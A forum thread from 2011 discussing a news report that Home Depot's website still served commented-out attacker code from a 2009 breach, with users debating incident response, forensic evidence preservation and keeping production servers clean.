No announcement yet.

Home Depot website served commented-out code from 2009 security breach...

  • Filter
  • Time
  • Show
Clear All
new posts

  • Home Depot website served commented-out code from 2009 security breach...

    Hacker Code Lingered on Home Depot Website

    In this news story, the Home Depot website up until recently was still serving (commented-out) code that was part of an attack in 2009. The argument posed, is that it was left in-place to analyze the attack, and then the article suggests it was forgotten about until recently, and finally removed.

    What are your thoughts on this? When you find a compromised machines or service, that is public-facing, do you leave the code in-place, even if disabled in some way to help with analysis, or do you duplicate the environment from within a private network so the public does not need to see the code if they choose to look at the source?

    Is this not feasible in many cases because of the resources required to replicate an environment with businesses?

    I'm reminded of a security presentation back in New York, where a speaker discussed three options available to someone when a security breach is found:
    1) Do nothing about the break, ignore it, and/or re-install from backup and keep going
    2) Choose not to take legal action: this means you can now examine the system in running state, change the code used, capture images of running code, see if you can infect virtualized systems to step through instruction, etc.
    3) Choose to go legal: Begin process of tracking chain of evidence, record who has access to what and shut down the system to keep the state as found so copies of images can be forensically examined to provide evidence of actions taken by the person or program,etc

    Each decision has requirements in results or actions that are mutually exclusive to the complement of whichever decision is selected.

    Is this the case with Home Depot? How might this influence support of their case against an attacker if evidence was required in court? Are there any other choices? Would you choose to leave an artifact like this in place for over a year on a public-facing server?

    What are your thoughts on this
    Last edited by TheCotMan; January 12, 2011, 00:20.

  • #2
    Re: Home Depot website served commented-out code from 2009 security breach...

    Production site should be perfect, do your testing (including security) on dev machines. If you really want to share the info with the public, put up a summary page that details what the bad guys did.
    --- The fuck? Have you ever BEEN to Defcon?